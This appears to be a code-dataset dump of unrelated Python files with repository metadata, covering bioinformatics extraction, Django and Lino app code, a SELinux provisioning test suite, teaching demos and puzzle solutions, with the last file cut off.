"44103490+daniela-venuta@users.noreply.github.com"
] |
44103490+daniela-venuta@users.noreply.github.com
|
5275b4089eb109d30621e280794a8c6e7ffdb7c3
|
8629f82f971f4e036c2b6358fe353a2c88bfd098
|
/scripts/extract_sequences.py
|
7c9b28f7fd0a5f74999951dd2fde3dae357dfaa0
|
[
"MIT"
] |
permissive
|
mahajrod/MAVR
|
92828fa1c191b5f8ed08f1ba33f1684df09742cd
|
8c57ff5519f130357e36e6f12868bc997e52a8a7
|
refs/heads/master
| 2023-08-25T01:02:24.738724
| 2023-08-22T15:13:39
| 2023-08-22T15:13:39
| 21,181,911
| 11
| 6
| null | 2017-09-18T20:25:16
| 2014-06-24T21:45:57
|
Python
|
UTF-8
|
Python
| false
| false
| 1,793
|
py
|
#!/usr/bin/env python2
__author__ = 'mahajrod'
import argparse
import os
from Bio import SeqIO
from BCBio import GFF
parser = argparse.ArgumentParser()
parser.add_argument("-g", "--in_gff", action="store", dest="in_gff",
help="input gff file")
parser.add_argument("-i", "--in_fasta", action="store", dest="in_fasta",
help="input fasta file")
parser.add_argument("-o", "--out_fasta", action="store", dest="out_fasta",
help="output fasta file")
args = parser.parse_args()
#sequence_dict = SeqIO.index_db("temp_index.idx", [args.in_fasta], format="fasta")
sequence_dict = SeqIO.to_dict(SeqIO.parse(args.in_fasta, format="fasta"))
annotated_dict = {}
with open(args.in_gff, "r") as gff_fd:
for record in GFF.parse(gff_fd, base_dict=sequence_dict):
annotated_dict[record.id] = record
#print(annotated_dict['2R'].features[25])
with open(args.out_fasta, "w") as out_fd:
for record in annotated_dict:
for feature in annotated_dict[record].features:
#print(feature.qualifiers)
feature_location = "%s:%s-%s:%s" % (record, feature.location.start,
feature.location.end, feature.location.strand)
feature_id = ",".join(feature.qualifiers["Parent"]) if "Parent" in feature.qualifiers \
else ",".join(feature.qualifiers["ID"]) if "ID" in feature.qualifiers else "."
feature_name = ",".join(feature.qualifiers["Name"]) if "Name" in feature.qualifiers else "."
feature_seq = feature.extract(annotated_dict[record].seq)
out_fd.write(">%s|%s|%s\n" % (feature_location, feature_id, feature_name))
out_fd.write(str(feature_seq) + "\n")
#os.system("rm temp_index.idx")
|
[
"mahajrod@gmail.com"
] |
mahajrod@gmail.com
|
c9fa9b364091e379c4cc912b154200787e702303
|
776cf3b0f5865c8639692e1256abb5ad493c9f92
|
/__old_stuff/pga/pga_no_sort/maps.py
|
b5503e9085e62d6d3cdc696a8de88c13ab354728
|
[] |
no_license
|
ralphbean/ms-thesis
|
90afb1d5729d83f1910d8dec2e6d4c65d0304bc0
|
3fea08aa069d735fb7048afbab37bb429800fb48
|
refs/heads/master
| 2021-01-19T11:28:14.382925
| 2012-01-25T15:24:54
| 2012-01-25T15:24:54
| 3,265,816
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
#!/usr/bin/python
from math import cos, sin, atan2, sqrt
# Some constants:
e = 2.71828183
mu = 5.5
a = 5
b = 25
W = [[ -a, a], [-b, b]]
def sigmoid( x, mu ):
return [( 1 + e**(-mu * ele))**-1 for ele in x]
def logistic( X, mu):
Y = [X[0], X[1]]
Y[0] = Y[0] * ( 1.0 - Y[0]) * mu
Y[1] = Y[1] * ( 1.0 - Y[1]) * mu
return Y
def squeezer( X, a ):
x = X[0]
y = X[1]
u = x
v = y/2.0 + (sqrt(1-x**2))/2.0
r = sqrt(v**2 + u**2)
theta = 2 * atan2(u,v)
u = a * r * cos(theta)
v = r * sin(theta)
Y = [u, v]
return Y
def network( x ):
return sigmoid( [-a * x[0] + a * x[1], -b * x[0] + b * x[1] ], mu )
|
[
"ralph.bean@gmail.com"
] |
ralph.bean@gmail.com
|
7b9565c9c890f3721eb0cfe90417c25a5f7cd443
|
f07b0142e37afe0bf8ed4d56399a0a49f5b1801b
|
/lino_xl/lib/phones/choicelists.py
|
f28f05d7ebd96e388d405b39764b669f8fb987a4
|
[
"BSD-2-Clause"
] |
permissive
|
khchine5/xl
|
af70fb21e4caeb05ff62e9618113c278d71a75ed
|
b1634937a9ce87af1e948eb712b934b11f221d9d
|
refs/heads/master
| 2021-01-20T22:51:01.193260
| 2018-08-22T07:47:43
| 2018-08-22T07:47:43
| 52,145,840
| 1
| 0
|
BSD-2-Clause
| 2018-08-19T12:29:06
| 2016-02-20T09:21:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,501
|
py
|
# Copyright 2017 Luc Saffre
#
# License: BSD (see file COPYING for details)
from django.core.validators import validate_email, URLValidator
from etgen.html import E
from lino.api import dd, _
from lino.modlib.office.roles import OfficeStaff
validate_url = URLValidator()
class ContactDetailType(dd.Choice):
field_name = None
def format(self, value):
return value
def validate(self, value):
return value
def as_html(self, obj, ar):
return obj.value
STD = ContactDetailType
class EMAIL(ContactDetailType):
def validate(self, value):
validate_email(value)
def as_html(self, obj, ar):
return E.a(obj.value, href="mailto:" + obj.value)
class URL(ContactDetailType):
def validate(self, value):
validate_url(value)
def as_html(self, obj, ar):
txt = obj.remark or obj.value
return E.a(txt, href=obj.value)
class ContactDetailTypes(dd.ChoiceList):
required_roles = dd.login_required(OfficeStaff)
verbose_name = _("Contact detail type")
verbose_name_plural = _("Contact detail types")
item_class = ContactDetailType
add = ContactDetailTypes.add_item_instance
add(EMAIL('010', _("E-Mail"), 'email', field_name="email"))
add(STD('020', _("Mobile"), 'gsm', field_name="gsm"))
add(STD('030', _("Phone"), 'phone', field_name="phone"))
add(URL('040', _("Website"), 'url', field_name="url"))
add(STD('050', _("Fax"), 'fax', field_name="fax"))
add(STD('090', _("Other"), 'other'))
|
[
"luc.saffre@gmail.com"
] |
luc.saffre@gmail.com
|
cdc23af2384a0e3b2df21f4083a35ba0ea45409d
|
f332e3028a5d8fb8a9c09f7f84e249c063e2a561
|
/admit/at/test/integrationtest_moment.py
|
ae28d020b133d1c2c01fe6aed178cb278bb54aee
|
[
"MIT"
] |
permissive
|
astroumd/admit
|
48098dc0490813467317dda4388c6de832ed8772
|
bbf3d79bb6e1a6f7523553ed8ede0d358d106f2c
|
refs/heads/master
| 2023-03-11T17:51:12.944237
| 2020-09-09T16:17:59
| 2020-09-09T16:17:59
| 69,020,469
| 4
| 2
| null | 2018-09-26T21:07:17
| 2016-09-23T11:54:08
|
Python
|
UTF-8
|
Python
| false
| false
| 4,739
|
py
|
#! /usr/bin/env casarun
#
#
# you can either use the "import" method from within casapy
# or use the casarun shortcut to run this from a unix shell
# with the argument being the casa image file to be processed
#
""" Right now you need to run this test inside of casapy
This test does the following:
creates an admit class
creates a moment AT
sets some moment parameters
adds the moment AT to the admit class
runs admit (which in turn runs the needed AT's)
writes the results out to disk
reads them into a new admit instance
prints out one of the BDP xml file names
to run this test do the following:
import admit.at.test.test_moment as tm
tm.run(<filename>) <filename> is the name of the image file to be processed (note for the time being you need to be in the directory containing the image file
"""
import admit
import unittest
import os
import sys
import traceback
class IntegTestMomentAT(unittest.TestCase):
def setUp(self):
self.root = admit.utils.admit_root()
self.inputFile = self.root + "/admit/at/test/mom_integ_test_input.fits"
self.admitdir = self.root + "/admit/at/test/mom_integ_test_input.admit"
self.testoutput = self.root+"/INTEGTESTRESULT"
self.success = "FAILED"
self.cleanup()
def tearDown(self):
self.cleanup()
self.cleanlogs()
f = open(self.testoutput,"a")
f.write(self.success+ " "+self.__class__.__name__ + "\n")
f.close()
def cleanup(self):
try:
cmd = "/bin/rm -rf %s*" % self.admitdir
os.system( cmd )
except Exception as ex :
print "failed to remove admit dir %s :" % self.admit_dir
print ex
# cleanlogs is separate because we don't want to remove logs we might
# be writing to.
def cleanlogs(self):
try:
os.system("/bin/rm -rf ipython*.log")
except:
print "failed to remove ipython logs"
try:
os.system("/bin/rm -rf casapy*.log")
except:
print "failed to remove casapy logs"
# Call the main method runTest() for automatic running.
#
# NB: don't use "run()" - it conflicts unittest.TestCase run()
# method and you get side effects, e.g. fileName =
# <unittest.runner.TextTestResult run=0 errors=0 failures=0>
#
def runTest(self):
try:
# instantiate the Admit class
a = admit.Project(self.admitdir)
# set up to write out figure files
a.plotparams(admit.PlotControl.BATCH,admit.PlotControl.PNG)
fitsin = admit.Ingest_AT(file=self.inputFile)
task0id = a.addtask(fitsin)
# instantiate a moment AT and set some moment parameters
m = admit.Moment_AT()
m.setkey('moments',[0,1,2])
m.setkey('sigma',0.005)
m.setkey('numsigma',[3.0])
task1id = a.addtask(m,[(task0id,0)])
# check the fm
a.fm.verify()
# run admit
a.run()
# save it out to disk.
a.write()
a2 = admit.Project(self.admitdir) # read in the admit.xml and bdp files
self.assertEqual(len(a.fm),len(a2.fm))
for atask in a.fm:
self.assertEqual(len(a.fm[atask]._bdp_out),
len(a2.fm[atask]._bdp_out))
# Note: we don't check bdp_in because they are connected
# "just in time" so will be set None up read-in.
self.assertEqual(a.fm._connmap,a2.fm._connmap)
for at in a.fm:
for i in range(len(a.fm[at]._bdp_out)) :
self.assertEqual( a.fm[at]._bdp_out[i]._taskid,
a2.fm[at]._bdp_out[i]._taskid)
self.assertEqual( a.fm[at]._bdp_out[i].xmlFile,
a2.fm[at]._bdp_out[i].xmlFile)
self.success = "OK"
except Exception, e:
m = "exception=%s, file=%s, lineno=%s" % ( sys.exc_info()[0].__name__, os.path.basename(sys.exc_info()[2].tb_frame.f_code.co_filename), sys.exc_info()[2].tb_lineno)
self.success = "FAILED"
traceback.print_exc()
self.fail("%s failed with: %s" % (self.__class__.__name__ , m))
###############################################################################
# END CLASS #
###############################################################################
suite = unittest.TestLoader().loadTestsFromTestCase(IntegTestMomentAT)
unittest.TextTestRunner(verbosity=0).run(suite)
|
[
"teuben@gmail.com"
] |
teuben@gmail.com
|
760438c3af5adf7bfb936c3a780f4284e5c4c8c5
|
bd87d8947878ccb2f5b720e70a22493b00868fd3
|
/justpy/02_basics/hello.py
|
2888edfd040f2b33e125af2a67c8b73a03f4132e
|
[] |
no_license
|
damiansp/completePython
|
4cbf12ef682a1d4a5498f77e407dc02e44a7d7ac
|
3f5e2f14d79c93df5147b82d901190c054535158
|
refs/heads/master
| 2023-09-01T20:50:03.444440
| 2023-08-28T00:27:57
| 2023-08-28T00:27:57
| 99,197,610
| 0
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 131
|
py
|
import justpy as jp
def hello():
    wp = jp.WebPage()
    p = jp.P(text='Hello, World!', a=wp)
    return wp
jp.justpy(hello)
|
[
"damiansp@gmail.com"
] |
damiansp@gmail.com
|
67369667933e56134fd39641a2ff54257295372e
|
f92dfdebb4bf6bc108f51783333520c35afa66da
|
/admin-web/src/www/application/modules/exon/actions.py
|
0f983721c26d50584b6b180491a8a68d2dd6eca0
|
[] |
no_license
|
duytran92-cse/nas-genodata
|
4d8659a135913d226842ff6a013324714ead0458
|
80c88f42145f729c5862a5293012e71548182e1d
|
refs/heads/master
| 2022-11-13T17:24:03.769605
| 2020-06-14T18:59:36
| 2020-06-14T18:59:36
| 272,264,593
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,962
|
py
|
from django.http import HttpResponse, HttpResponseRedirect
from django.conf import settings
from notasquare.urad_web import actions, page_contexts, widgets
from notasquare.urad_web_material import renderers
from application import constants
from . import components
import json
class List(actions.crud.ListAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class TableRenderer(renderers.widgets.table.DataTableRenderer):
def render_cell_actions(self, table, row):
html = '<div class="btn-group btn-group">'
html += ' <a class="btn btn-xs btn-primary" href="/exon/update/%s">Edit</a>' % (row['id'])
html += ' <a class="btn btn-xs btn-danger" href="/exon/delete/%s" onclick="return confirm(\'Are you really want to delete this?\')">Delete</a>' % (row['id'])
html += '</div>'
return html
def create_table(self):
table = widgets.table.DataTable()
table.set_title('Exon')
table.set_subtitle('List of exon')
# table.create_button('create', '/exon/create', 'zmdi-plus')
table.create_column('id', 'ID', '10%', sortable=True)
table.create_column('code', 'Code', '60%')
table.create_column('actions', '', '14%')
table.add_field(widgets.field.Textbox('text'))
table.add_field(widgets.field.Combobox('is_good_quality', choices=constants.FILTER))
table.renderer = self.TableRenderer()
table.renderer.table_form_renderer = renderers.widgets.form.TableFormRenderer()
table.renderer.table_form_renderer.add_field('text', 'Search', colspan=8)
table.renderer.table_form_renderer.add_field('is_good_quality', 'Quality', colspan=4)
table.renderer.table_form_renderer.set_field_renderer('textbox', renderers.widgets.field.TextboxRenderer())
table.renderer.table_form_renderer.set_field_renderer('combobox', renderers.widgets.field.ComboboxRenderer())
return table
def load_table_data(self, table_form_data, sortkey, sortdir, page_number):
return components.PageStore(self.get_container()).list(table_form_data, sortkey, sortdir, page_number)
class Update(actions.crud.FormAction):
def create_page_context(self):
return components.FullPageContext(self.params, self.container)
class PageUpdateRenderer(renderers.page_update.PageUpdateRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.PageUpdateRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).get(self.params['code'])
def GET(self):
page_context = self.create_page_context()
table_widget = self.create_table()
data = self.load_table_data()
data['page_id'] = 'exon'
table_widget.set_data(data)
page_context.add_widget(table_widget)
return HttpResponse(page_context.render())
class History(actions.crud.FormAction):
class HistoryRenderer(renderers.page_update.HistoryRenderer):
pass
def create_table(self):
table = widgets.table.DataTable()
table.renderer = self.HistoryRenderer()
return table
def load_table_data(self):
return components.PageStore(self.get_container()).history(self.params['code'], self.params['field'])
def GET(self):
page_context = renderers.page_update.HistoryRenderer()
table_widget = self.create_table()
record = self.load_table_data()
data = {}
data['data'] = record
data['text'] = {'field': self.params['field'], 'code': self.params['code']}
return HttpResponse(page_context.render(data))
class Delete(actions.crud.DeleteAction):
def GET(self):
result = components.PageStore(self.get_container()).delete(self.params['id'])
return HttpResponseRedirect('/exon/list')
|
[
"thanh.tran@etudiant.univ-lr.fr"
] |
thanh.tran@etudiant.univ-lr.fr
|
cd2b3e03c7d4829e4d97f8148c5adb257164f06b
|
9c124f6accd89a3ccf08b4c1205159d78c731f85
|
/5/main2.py
|
90c084d9fdd727393875c7852c0b3e4be61179b0
|
[] |
no_license
|
irongamer54/Sumer_2021
|
5600272dc11bddf6276bb56d0db4cff66ff6b20d
|
d61348274772cf95f0b06f904bfbb0ec61ebd1b1
|
refs/heads/master
| 2023-06-26T12:26:41.623768
| 2021-07-23T03:46:18
| 2021-07-23T03:46:18
| 383,372,964
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 196
|
py
|
from tkinter import *
root=Tk()
canvas=Canvas(root,width=500,height=500)
canvas.pack()
pers_obj = PhotoImage(file="pers.png")
canvas.create_image(50,50,anchor= NW, image=pers_obj)
root.mainloop()
|
[
"you@example.com"
] |
you@example.com
|
8dfcde4d529883da7fcaa024d87d1e941b74687a
|
6caab8d886e8bd302d1994ff663cf5ccb5e11522
|
/MyNotes_01/Step01/3-OO/day02_10/demo02.py
|
af2d3e088e530fe9803b841cfed86c5256b3275a
|
[] |
no_license
|
ZimingGuo/MyNotes01
|
7698941223c79ee754b17296b9984b731858b238
|
55e6681da1a9faf9c0ec618ed60f5da9ecc6beb6
|
refs/heads/master
| 2022-07-30T21:30:32.100042
| 2020-05-19T16:59:09
| 2020-05-19T16:59:09
| 265,254,345
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 935
|
py
|
# author: Ziming Guo
# time: 2020/2/15
"""
demo02:
类成员
练习:exercise03.py
"""
class ICBC:
"""
demo02:
工商银行
"""
# 表示总行的钱
total_money = 1000000 # 这不是对象的数据,这是类的数据
# 因为类方法没有对象地址self,所以不能访问实例成员
@classmethod
def print_total_money(cls):
# print(id(cls),id(ICBC))
print("总行还剩%d钱" % ICBC.total_money)
def __init__(self, name, money): # 这些才是对象的数据
self.name = name
self.money = money
# 表示从总行中扣除当前支行使用的金额
ICBC.total_money -= money
i01 = ICBC("广渠门支行", 100000)
ICBC.print_total_money()
i02 = ICBC("陶然亭支行", 100000)
# print("总行还剩%d钱" % ICBC.total_money)
# 通过类名访问类方法,会将类名传入类方法.
ICBC.print_total_money()
|
[
"guoziming99999@icloud.com"
] |
guoziming99999@icloud.com
|
cd15735e33041560a98ded732972d3b02180e502
|
d6815f4c7774d30c5d12d2205703427693294dec
|
/tests/unit/more/debian/security/test_selinux.py
|
af2403dca31f2fdbb42f262bc50c9f76b86bba2a
|
[
"MIT"
] |
permissive
|
python-provy/provy
|
2579bbedc31f559992b7c007a4a2e75424d3507f
|
ca3d5e96a2210daf3c1fd4b96e047efff152db14
|
refs/heads/master
| 2021-12-30T12:03:28.083794
| 2019-02-20T16:55:32
| 2019-02-20T16:55:32
| 1,948,340
| 16
| 3
|
MIT
| 2021-12-26T06:30:37
| 2011-06-24T16:01:45
|
Python
|
UTF-8
|
Python
| false
| false
| 4,010
|
py
|
from mock import call, patch
from nose.tools import istest
from provy.more.debian import AptitudeRole, SELinuxRole
from tests.unit.tools.helpers import ProvyTestCase
class SELinuxRoleTest(ProvyTestCase):
def setUp(self):
super(SELinuxRoleTest, self).setUp()
self.role = SELinuxRole(prov=None, context={'cleanup': []})
@istest
def provisions_correctly(self):
with self.mock_role_methods('install_packages', 'activate'):
self.role.provision()
self.role.install_packages.assert_called_with()
self.role.activate.assert_called_with()
@istest
def installs_packages_in_debian(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('debian'):
self.role.install_packages()
expected_packages = [
call('selinux-basics'),
call('selinux-policy-default'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def installs_packages_in_ubuntu(self):
with self.using_stub(AptitudeRole) as aptitude, self.provisioning_to('ubuntu'):
self.role.install_packages()
expected_packages = [
call('selinux'),
call('selinux-utils'),
call('auditd'),
call('audispd-plugins'),
]
self.assertEqual(aptitude.ensure_package_installed.mock_calls, expected_packages)
@istest
def activates_on_debian(self):
with self.execute_mock() as execute, self.provisioning_to('debian'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call('selinux-activate', stdout=False, sudo=True),
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def activates_on_ubuntu(self):
with self.execute_mock() as execute, self.provisioning_to('ubuntu'), patch.object(self.role, 'enforce'):
self.role.activate()
expected_calls = [
call("semanage login -m -s 'user_u' -r s0 __default__", stdout=False, sudo=True),
]
self.assertEqual(execute.mock_calls, expected_calls)
self.role.enforce.assert_called_with()
@istest
def puts_environment_in_enforce_mode(self):
with self.execute_mock(), self.mock_role_method('ensure_line'), self.warn_only():
self.role.enforce()
self.role.execute.assert_called_with('setenforce 1', stdout=False, sudo=True)
self.role.ensure_line.assert_called_with('SELINUX=enforcing', '/etc/selinux/config', sudo=True)
@istest
def ensures_that_a_login_mapping_exists(self):
with self.execute_mock() as execute, self.warn_only():
self.role.ensure_login_mapping('foo')
execute.assert_called_with('semanage login -a foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_an_selinux_user(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_login('foo', 'staff_u')
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with('semanage login -m -s staff_u foo', stdout=False, sudo=True)
@istest
def maps_a_login_user_to_selinux_roles(self):
with self.execute_mock() as execute, patch.object(self.role, 'ensure_login_mapping'):
self.role.map_role('foo', ['staff_r', 'sysadm_r'])
self.role.ensure_login_mapping.assert_called_with('foo')
execute.assert_called_with("semanage user -m -R 'staff_r sysadm_r' foo", stdout=False, sudo=True)
|
[
"diogobaeder@yahoo.com.br"
] |
diogobaeder@yahoo.com.br
|
9b6a7efd933b95b6d869bcec2a89469658c6997c
|
22f480f1ec13e59f1bcf4a244973db64f875e0db
|
/coroutine_test.py
|
42b3accced3c46d5ec3c57341d831fd9e94cd443
|
[] |
no_license
|
xiphodon/spider_hs_code
|
de3a4a555be2ed9dac295ef93a921c3697a6bc6a
|
c447c94c367c029fc13af458c668eb1f87a7b67c
|
refs/heads/master
| 2021-12-27T23:11:07.925493
| 2021-12-16T16:41:34
| 2021-12-16T16:41:34
| 105,999,246
| 4
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,598
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Time : 2019/5/10 9:45
# @Author : GuoChang
# @Site : https://github.com/xiphodon
# @File : coroutine_test.py
# @Software: PyCharm
"""协程测试"""
def consumer():
print('==== c_A ====')
r = ''
while True:
print('==== c_B ====')
n = yield r
print('==== c_C ====')
if not n:
return
print('[CONSUMER] Consuming %s...' % n)
r = '200 OK'
print('==== c_D ====')
def produce(c):
print('==== p_A ====')
r = c.send(None)
print('[PRODUCER] c.send(None) %s...' % r)
n = 0
print('==== p_B ====')
while n < 5:
n = n + 1
print('[PRODUCER] Producing %s...' % n)
print('==== p_C ====')
r = c.send(n)
print('==== p_D ====')
print('[PRODUCER] Consumer return: %s' % r)
c.close()
print('==== p_E ====')
def start_1():
c = consumer()
produce(c)
def generator_1():
total = 0
while True:
x = yield
print('adding', x)
if not x:
return total
total += x
def generator_2(): # delegating generator
while True:
print('while True')
total = yield from generator_1() # subgenerator
print('the total sum is:', total)
def start_2(): # the caller
g1 = generator_1()
g1.send(None)
g1.send(2)
g1.send(3)
g1.send(None)
def start_3():
g2 = generator_2()
g2.send(None)
g2.send(2)
g2.send(3)
g2.send(None)
if __name__ == '__main__':
# start_1()
# start_2()
start_3()
|
[
"827789895@qq.com"
] |
827789895@qq.com
|
c6fd884951bb2eeb1d9b7ce2023f5052fe299ee0
|
a1504798a55d652c9c0705cc507fe2cb9678ea4f
|
/Adavnce_CRUD/MySQL_Index/main.py
|
d3dc0fb9d8d0d67cb6cb139875050e8b004effdf
|
[] |
no_license
|
ritikapatel1410/Python_MySql
|
a4a952abd7b0394eafc071de0f55efd6a7a3b359
|
d90da25391243d5c08156a9184727c3e42e43517
|
refs/heads/main
| 2023-03-21T01:24:02.465879
| 2021-03-18T07:55:04
| 2021-03-18T07:55:04
| 347,563,406
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,533
|
py
|
"""
@Author: Ritika Patidar
@Date: 2021-03-15 00:10:10
@Last Modified by: Ritika Patidar
@Last Modified time: 2021-03-15 00:10:38
@Title : main code of perform index operation
"""
import sys
import os
sys.path.insert(0,os.path.relpath("LogFile"))
import loggerfile
from Mysql_Index import Index_Operation
def main():
"""
Description:
this function lets the user select a mode among the different index operations
Parameter:
None
Return:
None
"""
try:
Obj_Index_Operation=Index_Operation()
mode=int(input("================================= Select Mode For index =====================================\n0 : Create Index\n====================================\n1 : Explain Index\n==============================================\n2 : Show Index\n==================================================================\n3 : Drop Index\n=============================================\n4 : quit\n=================================================================\nenter : "))
if(mode==0):
print(Obj_Index_Operation.Create_Index())
elif(mode==1):
print(Obj_Index_Operation.Explain_Index())
elif(mode==2):
Obj_Index_Operation.Show_Index()
elif(mode==3):
print(Obj_Index_Operation.Drop_Index())
elif(mode==4):
sys.exit()
loggerfile.Logger("info","succesfully select the mode")
except Exception as error:
loggerfile.Logger("error","{0} error occured".format(error))
main()
|
[
"patelrit1410@gmail.com"
] |
patelrit1410@gmail.com
|
f70e05449d250838b42f4c3df78e59421ddc3543
|
a2f9d55d686425c4b47ce150aa1a23ea933055cc
|
/apps/tinymce/views.py
|
12c563915b667935e080b56611e1df8b35b9ad48
|
[] |
no_license
|
wd5/blombum
|
b31c581f2c36c220164901189be1ba95a8341e0e
|
fe11efb369fe2cec67af1e79bc8935a266df2f80
|
refs/heads/master
| 2020-12-25T02:23:30.297939
| 2010-06-29T10:03:31
| 2010-06-29T10:03:31
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 435
|
py
|
import re
from django.shortcuts import render_to_response
from django.template import RequestContext
from django.http import Http404, HttpResponseRedirect
from settingsDB.utils import SettingsCached
def read_path(request, path):
    if re.search('(jpg|png|jpeg|gif)$', path):
        return HttpResponseRedirect(SettingsCached.param.STATIC_URL+'js/tinymce/'+path)
    return render_to_response('tinymce/'+path, RequestContext(request))
|
[
"nide@inbox.ru"
] |
nide@inbox.ru
|
32a23f9df83cc51dbe7edb439bd22dbc167ade77
|
13d222bc3332378d433835914da26ed16b583c8b
|
/src/pemjh/challenge116/main.py
|
83123ed7d1f367503d574aa5a8a7a8a0a060e775
|
[] |
no_license
|
mattjhussey/pemjh
|
c27a09bab09cd2ade31dc23fffac07374bea9366
|
2ebb0a525d2d1c0ee28e83fdc2638c2bec97ac99
|
refs/heads/master
| 2023-04-16T03:08:59.390698
| 2023-04-08T10:54:00
| 2023-04-08T10:54:00
| 204,912,926
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 916
|
py
|
""" Challenge116 """
# pylint: disable=missing-docstring
from pemjh.function_tools import memoize
@memoize()
def num_variations(blocks, tile_size, dec=True):
    num = 0
    if blocks > 1:
        # work out with tile here
        if blocks >= tile_size:
            num += num_variations(blocks - tile_size,
                                  tile_size,
                                  False)
        # work out with tile not here
        num += num_variations(blocks - 1, tile_size, False)
    else:
        num = 1
    if dec:
        num -= 1
    return num
def process(blocks):
    num_2_variations = num_variations(blocks, 2)
    num_3_variations = num_variations(blocks, 3)
    num_4_variations = num_variations(blocks, 4)
    return num_2_variations + num_3_variations + num_4_variations
def main(blocks):
    """ challenge116 """
    return process(blocks)
|
[
"matthew.hussey@googlemail.com"
] |
matthew.hussey@googlemail.com
|
02eaf3db773ab02db6f4b89bf7367f023bcb00d3
|
9743d5fd24822f79c156ad112229e25adb9ed6f6
|
/xai/brain/wordbase/adjectives/_aggregated.py
|
fad5b0d4f6fa9ecaef3cf929a8aed423b13aacbd
|
[
"MIT"
] |
permissive
|
cash2one/xai
|
de7adad1758f50dd6786bf0111e71a903f039b64
|
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
|
refs/heads/master
| 2021-01-19T12:33:54.964379
| 2017-01-28T02:00:50
| 2017-01-28T02:00:50
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 269
|
py
|
from xai.brain.wordbase.adjectives._aggregate import _AGGREGATE
# class header
class _AGGREGATED(_AGGREGATE, ):
    def __init__(self,):
        _AGGREGATE.__init__(self)
        self.name = "AGGREGATED"
        self.specie = 'adjectives'
        self.basic = "aggregate"
        self.jsondata = {}
|
[
"xingwang1991@gmail.com"
] |
xingwang1991@gmail.com
|
bd0ddc98cc185bd0c345391c4fd04ccb8f855b0f
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/rnvBtoNMBtznXLhs8_24.py
|
3666f1e694da00a3301b67e01f1e0199407af097
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 313
|
py
|
def win_round(you, opp):
    res = []
    for item in [you, opp]:
        first = max(item)
        item.remove(first)
        second = max(item)
        res.append(int(str(first) + str(second)))
    you_score, opp_score = res
    if you_score > opp_score:
        return True
    return False
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
297a221039f6223d99486f0a5574016946b8bb72
|
6b2a8dd202fdce77c971c412717e305e1caaac51
|
/solutions_5670465267826688_1/Python/Saaber/saber_dijkstra.py
|
07db2c9ea613fb670076171aa5363a1bcd777e85
|
[] |
no_license
|
alexandraback/datacollection
|
0bc67a9ace00abbc843f4912562f3a064992e0e9
|
076a7bc7693f3abf07bfdbdac838cb4ef65ccfcf
|
refs/heads/master
| 2021-01-24T18:27:24.417992
| 2017-05-23T09:23:38
| 2017-05-23T09:23:38
| 84,313,442
| 2
| 4
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
d = {'11':'1', '1i':'i', '1j':'j', '1k':'k', \
'i1':'i', 'ii':'-1' , 'ij':'k', 'ik':'-j', \
'j1':'j', 'ji':'-k' , 'jj':'-1', 'jk':'i', \
'k1':'k', 'ki':'j' , 'kj':'-i', 'kk':'-1' }
def evaluate(s1, s2):
neg1, neg2 = s1.count('-') , s2.count('-')
t1, t2 = s1.replace('-',''), s2.replace('-','')
neg = neg1 + neg2
key = t1 + t2
res = d[key]
if (neg % 2) == 1:
if res[0] == '-':
res = res[1:]
else:
res = '-' + res
return res
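# For example, following the multiplication table d above:
#   evaluate('i', 'j') -> 'k' and evaluate('-i', 'j') -> '-k'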
def evaluate_substring(substr, result, flag_i, flag_ij):
if result == 'i':
flag_i = True
for i in xrange( len(substr)):
result = evaluate(result, substr[i])
if result == 'i' and flag_i == False:
flag_i = True
if result == 'k' and flag_i == True:
flag_ij = True
return result, flag_i, flag_ij
def power(a, b):
result = 1
ijop = 1
if b == 1 or a == '1':
return a
if a not in ['-1' , '1']:
result = evaluate(a, a)
result = pow(int(result) , int(b/2))
if (b %2 ) == 1:
result = evaluate(str(result), a)
else:
if (b % 2) == 0:
result = 1
else:
result = -1
ijop = -1
return str(result)
def evaluate_string(x, repeat):
res, flag_i, flag_ij = '1', False, False
f_r = 1
  # first result is null
res_x = ''
for i in xrange(repeat):
res, flag_i, flag_ij = evaluate_substring(x, res, flag_i, flag_ij)
if i == 0:
res_x = res
p = power(res, repeat)
#print ' p = ' + str(p)
if p != '-1':
return False
# for sure if it didn't find i and j, then it can't find it anymore
if i > 100000:
return False
if flag_i == True and flag_ij == True:
return True
if res == '-1' and flag_ij == True:
return True
return False
def main():
f_name = 'C-large.in.txt'
